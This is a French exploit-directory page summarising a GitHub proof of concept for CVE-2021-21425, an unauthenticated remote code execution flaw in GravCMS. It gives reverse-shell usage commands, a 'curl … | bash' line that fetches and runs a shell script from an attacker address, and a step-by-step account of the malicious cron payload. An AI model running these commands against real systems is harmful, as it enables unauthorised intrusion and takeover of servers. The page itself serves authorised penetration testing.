Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-21425 — CVE-2021-21425 - GravCMS 1.10.7 RCE non authentifié via le Scheduler. Exploit amélioré avec arguments CLI et encodage base64 automatique. | Kitploit
Outils/GitHubGitHub/d4ytox/cve-2021-21425
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubd4ytox/cve-2021-21425

CVE-2021-21425

CVE-2021-21425 - GravCMS 1.10.7 RCE non authentifié via le Scheduler. Exploit amélioré avec arguments CLI et encodage base64 automatique.

Voir le dépôt
111il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-21425 - RCE non authentifiée dans GravCMS

Preuve de concept améliorée pour CVE-2021-21425, une vulnérabilité d'exécution de code à distance non authentifiée dans GravCMS <= 1.10.7 via l'écriture arbitraire de YAML dans le planificateur.

Crédits

Ceci est un travail dérivé. La vulnérabilité et l'exploit original ne sont pas les miens.

RôleQui
Vulnérabilité découverte parMehmet Ince (@mdisec), PRODAFT / INVICTUS Europe — Mars 2021
PoC original par"legend" — Exploit-DB EDB-49973
Modifications dans ce dépôt pard4ytox

Ce que cette version change

L'EDB-49973 original nécessite de modifier manuellement des valeurs codées en dur dans le script. Cette version ajoute :

  • Des arguments en ligne de commande pour la cible, LHOST, LPORT
  • L'encodage base64 automatique de la charge utile du reverse shell
  • La prise en charge de commandes personnalisées (-c)
  • La gestion des erreurs et l'affichage de l'état

Ce sont des changements d'ergonomie apportés à un exploit existant. Aucune recherche sur la vulnérabilité n'est revendiquée.

Vulnérabilité

ChampValeur
CVECVE-2021-21425
EDB-ID49973
AffectéGravCMS <= 1.10.7
TypeRCE non authentifiée
CVSS9.8 (Critique)

Le plugin Grav Admin ne vérifie pas l'authentification sur certaines routes d'administration, ce qui permet à des utilisateurs non authentifiés d'écrire une configuration YAML arbitraire. Cet exploit abuse de la configuration du planificateur pour créer une tâche cron qui exécute du code PHP arbitraire.

Utilisation

# Reverse shell
python3 exploit.py -t http://target -s <LHOST> <LPORT>

# Commande personnalisée
python3 exploit.py -t http://target -c "id"

Exemples

# Obtenir un reverse shell sur la cible
python3 exploit.py -t http://10.10.10.5 -s 10.10.14.5 4444

# Exécuter une commande
python3 exploit.py -t http://grav.local:8080 -c "curl http://10.10.14.5/shell.sh | bash"

Prérequis

pip install requests

Fonctionnement

  1. Récupère /admin pour extraire le jeton admin-nonce (aucune authentification requise en raison de la vulnérabilité)
  2. Envoie un POST à /admin/config/scheduler avec une configuration de tâche cron malveillante
  3. Le planificateur exécute la charge utile PHP via /usr/bin/php -r eval(base64_decode(...))
  4. PHP écrit le reverse shell décodé en base64 dans /tmp/rev.sh et l'exécute

La tâche cron s'exécute chaque minute (* * * * *), donc le shell arrive en moins de 60 secondes.

Chronologie

  • 2021-03-18 - Vulnérabilité découverte par Mehmet Ince lors d'un test d'intrusion
  • 2021-03-29 - Divulguée
  • 2021-04-01 - Corrigée dans Grav Admin Plugin 1.10.8

Références

  • Entrée NVD
  • Avis de sécurité GitHub GHSA-6f53-6qgv-39pj
  • Article original de Mehmet Ince (Pentest Blog)
  • PoC original - Exploit-DB EDB-49973

Licence

MIT, s'appliquant uniquement aux modifications de ce dépôt. Le PoC amont ne porte aucune licence, il reste donc tous droits réservés par son auteur. Voir LICENSE pour l'avis d'attribution complet.

Avertissement

Pour les tests de sécurité autorisés uniquement. Assurez-vous d'avoir une autorisation écrite avant de tester contre tout système.

Télécharger l’outil